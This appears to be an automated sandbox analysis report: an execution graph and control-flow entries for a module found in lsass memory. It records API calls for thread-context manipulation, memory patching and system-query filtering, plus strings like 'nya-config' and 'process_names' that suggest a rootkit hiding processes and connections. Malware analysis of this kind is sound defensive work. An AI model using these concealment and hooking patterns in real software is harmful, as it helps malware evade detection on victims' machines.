202c0aeceb6 _invalid_parameter_noinfo 7799->7800 7803 202c0ae8070 7800->7803 7804 202c0ae8079 7803->7804 7805 202c0ae8084 GetCurrentProcess TerminateProcess 7804->7805 7806 202c0ae8848 IsProcessorFeaturePresent 7804->7806 7807 202c0ae8860 7806->7807 7812 202c0ae891c RtlCaptureContext 7807->7812 7813 202c0ae8936 RtlLookupFunctionEntry 7812->7813 7814 202c0ae894c RtlVirtualUnwind 7813->7814 7815 202c0ae8873 7813->7815 7814->7813 7814->7815 7816 202c0ae8814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7815->7816 7818 
202c0af0001 7817->7818 7819 202c0aec48f 7817->7819 7818->7819 7825 202c0af0a40 7818->7825 7821 202c0af0054 7819->7821 7822 202c0af006d 7821->7822 7824 202c0aec49f 7821->7824 7822->7824 7835 202c0aee8c4 7822->7835 7824->7753 7826 202c0aecab0 _invalid_parameter_noinfo 14 API calls 7825->7826 7827 202c0af0a4f 7826->7827 7833 202c0af0a95 7827->7833 7834 202c0aec558 EnterCriticalSection 7827->7834 7833->7819 7836 202c0aecab0 _invalid_parameter_noinfo 14 API calls 7835->7836 7837 202c0aee8cd 7836->7837 8950 202c0aef370 VirtualProtect 8529 202c0aeb7ea 8530 202c0aec2f4 14 API calls 8529->8530 8531 202c0aeb7ef 8530->8531 8532 202c0aeb85f 8531->8532 8533 202c0aeb815 GetModuleHandleW 8531->8533 8546 202c0aeb6f8 8532->8546 8533->8532 8537 202c0aeb822 8533->8537 8537->8532 8541 202c0aeb904 GetModuleHandleExW 8537->8541 8542 202c0aeb938 GetProcAddress 8541->8542 8543 202c0aeb94a 8541->8543 8542->8543 8544 202c0aeb95b FreeLibrary 8543->8544 8545 202c0aeb962 8543->8545 8544->8545 8545->8532 8558 202c0aec558 EnterCriticalSection 8546->8558 8559 202c0ae27e8 8561 202c0ae2867 _invalid_parameter_noinfo 8559->8561 8560 202c0ae2998 8561->8560 8562 202c0ae28c9 GetFileType 8561->8562 8563 202c0ae28ed 8562->8563 8564 202c0ae28d7 StrCpyW 8562->8564 8575 202c0ae1ad4 GetFinalPathNameByHandleW 8563->8575 8565 202c0ae28fc 8564->8565 8569 202c0ae299d 8565->8569 8573 202c0ae2906 8565->8573 8567 202c0ae3f88 StrCmpNIW 8567->8569 8568 202c0ae3f88 StrCmpNIW 8568->8573 8569->8560 8569->8567 8570 202c0ae3708 4 API calls 8569->8570 8571 202c0ae1dd4 2 API calls 8569->8571 8570->8569 8571->8569 8573->8560 8573->8568 8580 202c0ae3708 StrCmpIW 8573->8580 8584 202c0ae1dd4 8573->8584 8576 202c0ae1afe StrCmpNIW 8575->8576 8577 202c0ae1b3d 8575->8577 8576->8577 8578 202c0ae1b18 lstrlenW 8576->8578 8577->8565 8578->8577 8579 202c0ae1b2a StrCpyW 8578->8579 8579->8577 8581 202c0ae3751 PathCombineW 8580->8581 8582 202c0ae373a StrCpyW StrCatW 8580->8582 8583 202c0ae375a 8581->8583 8582->8583 8583->8573 8585 
202c0ae1df4 8584->8585 8586 202c0ae1deb 8584->8586 8585->8573 8587 202c0ae1530 2 API calls 8586->8587 8587->8585 8588 202c0aef3e4 8589 202c0aef41d 8588->8589 8590 202c0aef3ee 8588->8590 8590->8589 8591 202c0aef403 FreeLibrary 8590->8591 8591->8590 8592 202c0af33e4 8593 202c0af33fb 8592->8593 8594 202c0af33f5 CloseHandle 8592->8594 8594->8593 8595 202c0ae63e3 8596 202c0ae63f0 8595->8596 8597 202c0ae63fc GetThreadContext 8596->8597 8602 202c0ae655a 8596->8602 8598 202c0ae6422 8597->8598 8597->8602 8598->8602 8604 202c0ae6449 8598->8604 8599 202c0ae6581 VirtualProtect FlushInstructionCache 8599->8602 8600 202c0ae663e 8601 202c0ae665e 8600->8601 8613 202c0ae4b20 8600->8613 8617 202c0ae5530 GetCurrentProcess 8601->8617 8602->8599 8602->8600 8605 202c0ae64cd 8604->8605 8607 202c0ae64a6 SetThreadContext 8604->8607 8607->8605 8608 202c0ae6677 ResumeThread 8610 202c0ae6663 8608->8610 8609 202c0ae66b7 8611 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8609->8611 8610->8608 8610->8609 8612 202c0ae66ff 8611->8612 8615 202c0ae4b3c 8613->8615 8614 202c0ae4b9f 8614->8601 8615->8614 8616 202c0ae4b52 VirtualFree 8615->8616 8616->8615 8618 202c0ae554c 8617->8618 8619 202c0ae5562 VirtualProtect FlushInstructionCache 8618->8619 8620 202c0ae5593 8618->8620 8619->8618 8620->8610 7492 202c0ae2300 NtQuerySystemInformation 7493 202c0ae233c 7492->7493 7494 202c0ae2447 7493->7494 7502 202c0ae2355 7493->7502 7505 202c0ae2412 7493->7505 7495 202c0ae244c 7494->7495 7496 202c0ae24bb 7494->7496 7512 202c0ae35c8 GetProcessHeap HeapAlloc 7495->7512 7498 202c0ae24c0 7496->7498 7496->7505 7500 202c0ae35c8 11 API calls 7498->7500 7499 202c0ae238d StrCmpNIW 7499->7502 7503 202c0ae2464 7500->7503 7501 202c0ae23b4 7501->7502 7506 202c0ae1d30 7501->7506 7502->7499 7502->7501 7502->7505 7503->7505 7507 202c0ae1d57 GetProcessHeap HeapAlloc 7506->7507 7508 202c0ae1db4 7506->7508 7507->7508 7509 202c0ae1d92 7507->7509 7508->7501 7518 202c0ae1cfc 7509->7518 7517 202c0ae361b 7512->7517 7513 202c0ae36d9 
GetProcessHeap HeapFree 7513->7503 7514 202c0ae36d4 7514->7513 7515 202c0ae3666 StrCmpNIW 7515->7517 7516 202c0ae1d30 6 API calls 7516->7517 7517->7513 7517->7514 7517->7515 7517->7516 7519 202c0ae1d1c GetProcessHeap HeapFree 7518->7519 7520 202c0ae1d13 7518->7520 7519->7508 7522 202c0ae1530 7520->7522 7523 202c0ae154a 7522->7523 7526 202c0ae1580 7522->7526 7524 202c0ae1561 StrCmpIW 7523->7524 7525 202c0ae1569 StrCmpW 7523->7525 7523->7526 7524->7523 7525->7523 7526->7519 7838 202c0ae2c80 TlsGetValue TlsGetValue TlsGetValue 7839 202c0ae2cd9 7838->7839 7845 202c0ae2d51 7838->7845 7841 202c0ae2ce1 7839->7841 7839->7845 7840 202c0ae2d4c 7841->7840 7842 202c0ae2e06 TlsSetValue TlsSetValue TlsSetValue 7841->7842 7846 202c0ae3f88 7841->7846 7842->7840 7844 202c0ae3f88 StrCmpNIW 7844->7845 7845->7840 7845->7842 7845->7844 7847 202c0ae3faa 7846->7847 7848 202c0ae3f95 StrCmpNIW 7846->7848 7847->7841 7848->7847 8960 202c0aec180 8963 202c0aebf38 8960->8963 8970 202c0aebf00 8963->8970 8971 202c0aebf10 8970->8971 8972 202c0aebf15 8970->8972 8973 202c0aebebc 13 API calls 8971->8973 8974 202c0aebf1c 8972->8974 8973->8972 8975 202c0aebf31 8974->8975 8976 202c0aebf2c 8974->8976 8978 202c0aebebc 8975->8978 8977 202c0aebebc 13 API calls 8976->8977 8977->8975 8979 202c0aebec1 8978->8979 8980 202c0aebef2 8978->8980 8981 202c0aebeea 8979->8981 8983 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8979->8983 8982 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8981->8982 8982->8980 8983->8979 9217 202c0aeb500 9222 202c0aec558 EnterCriticalSection 9217->9222 7849 202c0af387c 7850 202c0af38b4 __GSHandlerCheckCommon 7849->7850 7851 202c0af38e0 7850->7851 7853 202c0ae9a24 7850->7853 7860 202c0ae9324 7853->7860 7855 202c0ae9a4e 7856 202c0ae9324 _CallSETranslator 9 API calls 7855->7856 7857 202c0ae9a5b 7856->7857 7858 202c0ae9324 _CallSETranslator 9 API calls 7857->7858 7859 202c0ae9a64 7858->7859 7859->7851 7863 202c0ae9340 7860->7863 7862 
202c0ae932d 7862->7855 7864 202c0ae935f GetLastError 7863->7864 7865 202c0ae9358 7863->7865 7875 202c0ae9c8c 7864->7875 7865->7862 7879 202c0ae9aac 7875->7879 7880 202c0ae9b96 TlsGetValue 7879->7880 7886 202c0ae9af0 __vcrt_FlsAlloc 7879->7886 7881 202c0ae9b1e LoadLibraryExW 7883 202c0ae9b3f GetLastError 7881->7883 7884 202c0ae9bbd 7881->7884 7882 202c0ae9bdd GetProcAddress 7882->7880 7883->7886 7884->7882 7885 202c0ae9bd4 FreeLibrary 7884->7885 7885->7882 7886->7880 7886->7881 7886->7882 7887 202c0ae9b61 LoadLibraryExW 7886->7887 7887->7884 7887->7886 8621 202c0aecbfc 8626 202c0aef3a0 8621->8626 8623 202c0aecc05 8624 202c0aecb10 __std_exception_copy 13 API calls 8623->8624 8625 202c0aecc22 __vcrt_uninitialize_ptd 8623->8625 8624->8625 8627 202c0aef3b1 8626->8627 8628 202c0aef3b5 8626->8628 8627->8623 8628->8627 8629 202c0aeef88 9 API calls 8628->8629 8629->8627 8630 202c0ae41f9 8631 202c0ae4146 _invalid_parameter_noinfo 8630->8631 8632 202c0ae4196 VirtualQuery 8631->8632 8633 202c0ae41b0 8631->8633 8634 202c0ae41ca VirtualAlloc 8631->8634 8632->8631 8632->8633 8634->8633 8635 202c0ae41fb GetLastError 8634->8635 8635->8631 8636 202c0ae5ff9 8637 202c0ae6000 VirtualProtect 8636->8637 8638 202c0ae6029 GetLastError 8637->8638 8639 202c0ae5f10 8637->8639 8638->8639 8984 202c0ae5974 8985 202c0ae597a 8984->8985 8996 202c0ae7fa0 8985->8996 8989 202c0ae59de 8991 202c0ae5a77 _invalid_parameter_noinfo 8991->8989 8993 202c0ae5bfd 8991->8993 9009 202c0ae7b80 8991->9009 8992 202c0ae5cfb 8993->8992 8994 202c0ae5d77 VirtualProtect 8993->8994 8994->8989 8995 202c0ae5da3 GetLastError 8994->8995 8995->8989 8997 202c0ae7fab 8996->8997 8998 202c0ae59bd 8997->8998 8999 202c0aeb470 _invalid_parameter_noinfo 2 API calls 8997->8999 9000 202c0ae7fca 8997->9000 8998->8989 9005 202c0ae4400 8998->9005 8999->8997 9003 202c0ae7fd5 9000->9003 9015 202c0ae87b8 9000->9015 9019 202c0ae87d8 9003->9019 9006 202c0ae441d 9005->9006 9008 202c0ae448c _invalid_parameter_noinfo 9006->9008 9023 202c0ae4670 
9006->9023 9008->8991 9010 202c0ae7bc7 9009->9010 9048 202c0ae7950 9010->9048 9013 202c0ae8070 _invalid_parameter_noinfo 8 API calls 9014 202c0ae7bf1 9013->9014 9014->8991 9016 202c0ae87c6 std::bad_alloc::bad_alloc 9015->9016 9017 202c0ae9178 Concurrency::cancel_current_task 2 API calls 9016->9017 9018 202c0ae87d7 9017->9018 9020 202c0ae87e6 std::bad_alloc::bad_alloc 9019->9020 9021 202c0ae9178 Concurrency::cancel_current_task 2 API calls 9020->9021 9022 202c0ae7fdb 9021->9022 9024 202c0ae46b7 9023->9024 9025 202c0ae4694 9023->9025 9026 202c0ae46ed 9024->9026 9043 202c0ae4250 9024->9043 9025->9024 9037 202c0ae4120 9025->9037 9027 202c0ae471d 9026->9027 9030 202c0ae4250 2 API calls 9026->9030 9031 202c0ae4120 3 API calls 9027->9031 9034 202c0ae4753 9027->9034 9030->9027 9031->9034 9032 202c0ae4120 3 API calls 9035 202c0ae476f 9032->9035 9033 202c0ae4250 2 API calls 9036 202c0ae478b 9033->9036 9034->9032 9034->9035 9035->9033 9035->9036 9036->9008 9042 202c0ae4141 _invalid_parameter_noinfo 9037->9042 9038 202c0ae4196 VirtualQuery 9041 202c0ae41b0 9038->9041 9038->9042 9039 202c0ae41ca VirtualAlloc 9040 202c0ae41fb GetLastError 9039->9040 9039->9041 9040->9042 9041->9024 9042->9038 9042->9039 9042->9041 9046 202c0ae4268 _invalid_parameter_noinfo 9043->9046 9044 202c0ae42bd VirtualQuery 9045 202c0ae42d7 9044->9045 9044->9046 9045->9026 9046->9044 9046->9045 9047 202c0ae4322 GetLastError 9046->9047 9047->9045 9047->9046 9049 202c0ae796b 9048->9049 9050 202c0ae7981 SetLastError 9049->9050 9051 202c0ae798f 9049->9051 9050->9051 9051->9013 9223 202c0af46f5 9224 202c0ae9324 _CallSETranslator 9 API calls 9223->9224 9225 202c0af470d 9224->9225 9226 202c0ae9324 _CallSETranslator 9 API calls 9225->9226 9227 202c0af4728 9226->9227 9228 202c0ae9324 _CallSETranslator 9 API calls 9227->9228 9229 202c0af473c 9228->9229 9230 202c0ae9324 _CallSETranslator 9 API calls 9229->9230 9231 202c0af477e 9230->9231 7888 202c0ae8672 7891 202c0ae90c0 7888->7891 7890 202c0ae869d 7892 202c0ae9116 
7891->7892 7893 202c0ae90e1 7891->7893 7892->7890 7893->7892 7895 202c0aec328 7893->7895 7896 202c0aec33f 7895->7896 7897 202c0aec335 7895->7897 7898 202c0aed1f4 __std_exception_copy 13 API calls 7896->7898 7897->7896 7899 202c0aec35a 7897->7899 7903 202c0aec346 7898->7903 7901 202c0aec352 7899->7901 7902 202c0aed1f4 __std_exception_copy 13 API calls 7899->7902 7900 202c0aed04c _invalid_parameter_noinfo 38 API calls 7900->7901 7901->7892 7902->7903 7903->7900 9232 202c0ae86d0 9233 202c0ae90c0 __std_exception_copy 38 API calls 9232->9233 9234 202c0ae86f9 9233->9234 8640 202c0af19d0 8643 202c0aee864 8640->8643 8644 202c0aee871 8643->8644 8648 202c0aee8b6 8643->8648 8649 202c0aecacc 8644->8649 8646 202c0aee8a0 8654 202c0aee53c 8646->8654 8650 202c0aecae8 FlsGetValue 8649->8650 8652 202c0aecae4 8649->8652 8650->8652 8651 202c0aecafe 8651->8646 8652->8651 8653 202c0aec940 _invalid_parameter_noinfo 13 API calls 8652->8653 8653->8651 8677 202c0aee7ac 8654->8677 8659 202c0aee58e 8659->8648 8660 202c0aec5d0 14 API calls 8661 202c0aee59f 8660->8661 8662 202c0aee5a7 8661->8662 8664 202c0aee5b6 8661->8664 8663 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8662->8663 8663->8659 8664->8664 8696 202c0aee8e0 8664->8696 8667 202c0aee6b2 8668 202c0aed1f4 __std_exception_copy 13 API calls 8667->8668 8669 202c0aee6b7 8668->8669 8672 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8669->8672 8670 202c0aee70d 8671 202c0aee774 8670->8671 8707 202c0aee05c 8670->8707 8675 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8671->8675 8672->8659 8673 202c0aee6cc 8673->8670 8676 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8673->8676 8675->8659 8676->8670 8678 202c0aee7cf 8677->8678 8683 202c0aee7d9 8678->8683 8722 202c0aec558 EnterCriticalSection 8678->8722 8684 202c0aee571 8683->8684 8686 202c0aecacc 14 API calls 8683->8686 8689 202c0aee22c 8684->8689 8687 202c0aee8a0 8686->8687 8688 
202c0aee53c 56 API calls 8687->8688 8688->8684 8690 202c0aedd78 14 API calls 8689->8690 8691 202c0aee240 8690->8691 8692 202c0aee25e 8691->8692 8693 202c0aee24c GetOEMCP 8691->8693 8694 202c0aee273 8692->8694 8695 202c0aee263 GetACP 8692->8695 8693->8694 8694->8659 8694->8660 8695->8694 8697 202c0aee22c 16 API calls 8696->8697 8698 202c0aee91b 8697->8698 8699 202c0aeea71 8698->8699 8700 202c0aee958 IsValidCodePage 8698->8700 8706 202c0aee972 _invalid_parameter_noinfo 8698->8706 8701 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8699->8701 8700->8699 8702 202c0aee969 8700->8702 8703 202c0aee6a9 8701->8703 8704 202c0aee998 GetCPInfo 8702->8704 8702->8706 8703->8667 8703->8673 8704->8699 8704->8706 8723 202c0aee344 8706->8723 8796 202c0aec558 EnterCriticalSection 8707->8796 8724 202c0aee38f GetCPInfo 8723->8724 8725 202c0aee485 8723->8725 8724->8725 8731 202c0aee3a2 8724->8731 8726 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8725->8726 8728 202c0aee524 8726->8728 8728->8699 8734 202c0af1474 8731->8734 8733 202c0af1938 33 API calls 8733->8725 8735 202c0aedd78 14 API calls 8734->8735 8736 202c0af14b6 8735->8736 8737 202c0aeec58 MultiByteToWideChar 8736->8737 8739 202c0af14ec 8737->8739 8738 202c0af14f3 8740 202c0ae8070 _invalid_parameter_noinfo 8 API calls 8738->8740 8739->8738 8741 202c0aec5d0 14 API calls 8739->8741 8743 202c0af15b0 8739->8743 8745 202c0af151c _invalid_parameter_noinfo 8739->8745 8742 202c0aee419 8740->8742 8741->8745 8749 202c0af1938 8742->8749 8743->8738 8744 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8743->8744 8744->8738 8745->8743 8746 202c0aeec58 MultiByteToWideChar 8745->8746 8747 202c0af1592 8746->8747 8747->8743 8748 202c0af1596 GetStringTypeW 8747->8748 8748->8743 8750 202c0aedd78 14 API calls 8749->8750 8751 202c0af195d 8750->8751 8754 202c0af1604 8751->8754 8755 202c0af1645 8754->8755 8756 202c0aeec58 MultiByteToWideChar 8755->8756 8759 202c0af168f 8756->8759 8757 202c0af190d 8758 202c0ae8070 
_invalid_parameter_noinfo 8 API calls 8757->8758 8760 202c0aee44c 8758->8760 8759->8757 8761 202c0aec5d0 14 API calls 8759->8761 8762 202c0af17c5 8759->8762 8764 202c0af16c7 8759->8764 8760->8733 8761->8764 8762->8757 8763 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8762->8763 8763->8757 8764->8762 8765 202c0aeec58 MultiByteToWideChar 8764->8765 8766 202c0af173a 8765->8766 8766->8762 8785 202c0aef218 8766->8785 8768 202c0af176d 8768->8762 8769 202c0af17d6 8768->8769 8770 202c0af1785 8768->8770 8771 202c0aec5d0 14 API calls 8769->8771 8773 202c0af18a8 8769->8773 8774 202c0af17f4 8769->8774 8770->8762 8772 202c0aef218 10 API calls 8770->8772 8771->8774 8772->8762 8773->8762 8775 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8773->8775 8774->8762 8776 202c0aef218 10 API calls 8774->8776 8775->8762 8777 202c0af1874 8776->8777 8777->8773 8778 202c0af18aa 8777->8778 8779 202c0af1894 8777->8779 8780 202c0aeece8 WideCharToMultiByte 8778->8780 8781 202c0aeece8 WideCharToMultiByte 8779->8781 8782 202c0af18a2 8780->8782 8781->8782 8782->8773 8783 202c0af18c2 8782->8783 8783->8762 8784 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8783->8784 8784->8762 8786 202c0aef244 8785->8786 8790 202c0aef267 8785->8790 8788 202c0aeef88 9 API calls 8786->8788 8791 202c0aef26f 8786->8791 8788->8790 8789 202c0aef2cd LCMapStringW 8789->8791 8790->8791 8792 202c0aef30c 8790->8792 8791->8768 8793 202c0aef34a 8792->8793 8794 202c0aef328 8792->8794 8793->8789 8794->8793 8795 202c0aeef88 9 API calls 8794->8795 8795->8793 9052 202c0af494f 9053 202c0af495e 9052->9053 9054 202c0af4968 9052->9054 9056 202c0aec5ac LeaveCriticalSection 9053->9056 7904 202c0ae824c 7906 202c0ae8270 __scrt_release_startup_lock 7904->7906 7905 202c0aeb581 7906->7905 7907 202c0aecb10 __std_exception_copy 13 API calls 7906->7907 7908 202c0aeb5aa 7907->7908 8797 202c0ae5fcc 8798 202c0ae5fd3 8797->8798 8799 202c0ae6000 VirtualProtect 
8798->8799 8801 202c0ae5f10 8798->8801 8800 202c0ae6029 GetLastError 8799->8800 8799->8801 8800->8801 9057 202c0aead48 9058 202c0ae9324 _CallSETranslator 9 API calls 9057->9058 9059 202c0aead7d 9058->9059 9060 202c0ae9324 _CallSETranslator 9 API calls 9059->9060 9061 202c0aead8b __except_validate_context_record 9060->9061 9062 202c0ae9324 _CallSETranslator 9 API calls 9061->9062 9063 202c0aeadcf 9062->9063 9064 202c0ae9324 _CallSETranslator 9 API calls 9063->9064 9065 202c0aeadd8 9064->9065 9066 202c0ae9324 _CallSETranslator 9 API calls 9065->9066 9067 202c0aeade1 9066->9067 9080 202c0ae993c 9067->9080 9070 202c0ae9324 _CallSETranslator 9 API calls 9071 202c0aeae11 __CxxCallCatchBlock 9070->9071 9072 202c0ae9978 __CxxCallCatchBlock 9 API calls 9071->9072 9076 202c0aeaec2 9072->9076 9073 202c0aeaeeb __CxxCallCatchBlock 9074 202c0ae9324 _CallSETranslator 9 API calls 9073->9074 9075 202c0aeaefe 9074->9075 9077 202c0ae9324 _CallSETranslator 9 API calls 9075->9077 9076->9073 9078 202c0ae8ff8 __CxxCallCatchBlock 9 API calls 9076->9078 9079 202c0aeaf07 9077->9079 9078->9073 9081 202c0ae9324 _CallSETranslator 9 API calls 9080->9081 9082 202c0ae994d 9081->9082 9083 202c0ae9958 9082->9083 9084 202c0ae9324 _CallSETranslator 9 API calls 9082->9084 9085 202c0ae9324 _CallSETranslator 9 API calls 9083->9085 9084->9083 9086 202c0ae9969 9085->9086 9086->9070 9086->9071 7909 202c0af4848 7912 202c0ae904c 7909->7912 7913 202c0ae9076 7912->7913 7914 202c0ae9064 7912->7914 7916 202c0ae9324 _CallSETranslator 9 API calls 7913->7916 7914->7913 7915 202c0ae906c 7914->7915 7917 202c0ae9324 _CallSETranslator 9 API calls 7915->7917 7918 202c0ae9074 7915->7918 7919 202c0ae907b 7916->7919 7921 202c0ae909b 7917->7921 7919->7918 7920 202c0ae9324 _CallSETranslator 9 API calls 7919->7920 7920->7918 7922 202c0ae9324 _CallSETranslator 9 API calls 7921->7922 7923 202c0ae90a8 7922->7923 7928 202c0aec2f4 7923->7928 7929 202c0aecab0 _invalid_parameter_noinfo 14 API calls 7928->7929 7930 202c0aec2fd 
[Execution graph: Joe Sandbox call-graph node and edge listing (function addresses in the range 202c0ae1000 to 202c0af4877 with their referenced imports), flattened into running text by extraction. Only the API names referenced in the graph are recoverable; grouped by purpose they are:

Registry enumeration: RegOpenKeyExW, RegQueryInfoKeyW, RegEnumValueW, RegCloseKey
File and module enumeration: FindFirstFileExW, FindNextFileW, FindClose, GetFileType, GetModuleFileNameW, K32GetModuleFileNameExW, PathFindFileNameW
Process and memory manipulation: OpenProcess, CloseHandle, SetThreadContext, ResumeThread, VirtualProtect, VirtualQuery, VirtualFree, FlushInstructionCache
Dynamic import resolution: LoadLibraryA, LoadLibraryExW, GetProcAddress, FreeLibrary
Performance-counter queries: PdhGetCounterInfoW
Timing and identity: SleepEx, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW
String helpers: StrCmpW, StrCmpIW, StrCmpNW, StrCmpNIW, StrStrW, StrToIntW, StrCpyW, lstrlenW, MultiByteToWideChar, WideCharToMultiByte
Heap, TLS and synchronization: GetProcessHeap, HeapAlloc, HeapReAlloc, HeapFree, HeapSize, TlsAlloc, TlsGetValue, TlsSetValue, FlsSetValue, InitializeCriticalSectionAndSpinCount, EnterCriticalSection, DeleteCriticalSection, GetLastError, SetLastError, EncodePointer
C runtime and exception handling: RaiseException, RtlUnwindEx, RtlLookupFunctionEntry, RtlPcToFileHeader, _CallSETranslator, __CxxCallCatchBlock, __std_exception_copy, _invalid_parameter_noinfo, __except_validate_context_record, _IsNonwritableInCurrentImage, __vcrt_FlsAlloc, __scrt_release_startup_lock, __scrt_dllmain_exception_filter, __FrameHandler3::GetHandlerSearchState, __FrameHandler3::FrameUnwindToEmptyState, __FrameHandler3::ExecutionInCatch, __GetCurrentState, __GetUnwindTryBlock, Is_bad_exception_allowed, std::bad_alloc::bad_alloc, Concurrency::details::SchedulerProxy::DeleteThis]
API calls 7584->7585 7585->7583 7591 202c0aec630 7586->7591 7603 202c0aec558 EnterCriticalSection 7591->7603 8920 202c0aefe20 8921 202c0aefe4a 8920->8921 8922 202c0aed220 _invalid_parameter_noinfo 13 API calls 8921->8922 8923 202c0aefe6a 8922->8923 8924 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8923->8924 8925 202c0aefe78 8924->8925 8926 202c0aefea2 8925->8926 8927 202c0aed220 _invalid_parameter_noinfo 13 API calls 8925->8927 8928 202c0aefec1 InitializeCriticalSectionEx 8926->8928 8931 202c0aefeab 8926->8931 8929 202c0aefe94 8927->8929 8928->8926 8930 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8929->8930 8930->8926 8932 202c0aef820 8935 202c0aef7d8 8932->8935 8940 202c0aec558 EnterCriticalSection 8935->8940 9198 202c0af479d 9201 202c0aeaf34 9198->9201 9202 202c0aeaf4e 9201->9202 9204 202c0aeaf9b 9201->9204 9203 202c0ae9324 _CallSETranslator 9 API calls 9202->9203 9202->9204 9203->9204 9390 202c0ae2518 GetProcessIdOfThread GetCurrentProcessId 9391 202c0ae25be 9390->9391 9392 202c0ae2543 CreateFileW 9390->9392 9392->9391 9393 202c0ae2577 WriteFile ReadFile CloseHandle 9392->9393 9393->9391 8941 202c0aec218 8942 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8941->8942 8943 202c0aec228 8942->8943 8944 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8943->8944 8945 202c0aec23c 8944->8945 8946 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8945->8946 8947 202c0aec250 8946->8947 8948 202c0aed2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 8947->8948 8949 202c0aec264 8948->8949 9205 202c0af1398 9206 202c0af13ae 9205->9206 9207 202c0af13f5 9206->9207 9208 202c0af140e 9206->9208 9209 202c0aed1f4 __std_exception_copy 13 API calls 9207->9209 9211 202c0aedd78 14 API calls 9208->9211 9213 202c0af1405 9208->9213 9210 202c0af13fa 9209->9210 9212 202c0aed04c _invalid_parameter_noinfo 38 API calls 9210->9212 9211->9213 
9212->9213

                                                          Control-flow Graph

[Graph of 202c0ae2300-202c0ae2517 not rendered; the executed/not-executed node colouring is lost. The function calls NtQuerySystemInformation and StrCmpNIW and the subroutines 202c0ae35c8, 202c0ae1cc4 and 202c0ae1d30.]
                                                          APIs
                                                          • NtQuerySystemInformation.NTDLL ref: 00000202C0AE232B
                                                          • StrCmpNIW.SHLWAPI ref: 00000202C0AE239A
                                                            • Part of subcall function 00000202C0AE35C8: GetProcessHeap.KERNEL32(?,?,?,?,?,00000202C0AE24D1), ref: 00000202C0AE35EB
                                                            • Part of subcall function 00000202C0AE35C8: HeapAlloc.KERNEL32(?,?,?,?,?,00000202C0AE24D1), ref: 00000202C0AE35FE
                                                            • Part of subcall function 00000202C0AE35C8: StrCmpNIW.SHLWAPI(?,?,?,?,?,00000202C0AE24D1), ref: 00000202C0AE3673
                                                            • Part of subcall function 00000202C0AE35C8: GetProcessHeap.KERNEL32(?,?,?,?,?,00000202C0AE24D1), ref: 00000202C0AE36D9
                                                            • Part of subcall function 00000202C0AE35C8: HeapFree.KERNEL32(?,?,?,?,?,00000202C0AE24D1), ref: 00000202C0AE36E7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                          • String ID: $nya-$S
                                                          • API String ID: 722747020-3492252248
                                                          • Opcode ID: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                                          • Instruction ID: 976f185b7510bdf11140a7ca03e3180a70de357a2b4d5b6b1581422fb8e9235f
                                                          • Opcode Fuzzy Hash: 4ac77b2c6d0e63e88a47bc1c42b4b05fc6ca31a13af142bc6dc0eee490c53e66
                                                          • Instruction Fuzzy Hash: F451C132B107A4C6F760CB25D88CAAD63E4F744788F069027DFA917B86DB39C969C700

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source: same as above (0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, offset 00000202C0AE0000, same five associated dumps)
                                                          Joe Sandbox IDA Plugin: same snapshot as above (hcaresult_10_2_202c0ae0000_lsass.jbxd)
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-3572789727
                                                          • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction ID: dc3027e100e7a8585adb976db0aa4c1227795743895ae4604795d7442d5a4fc6
                                                          • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                          • Instruction Fuzzy Hash: DD71C636610B50C9FB10DF76E89C69D23A4FB84B88F421123DB9E57A6ADE39C458C740

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
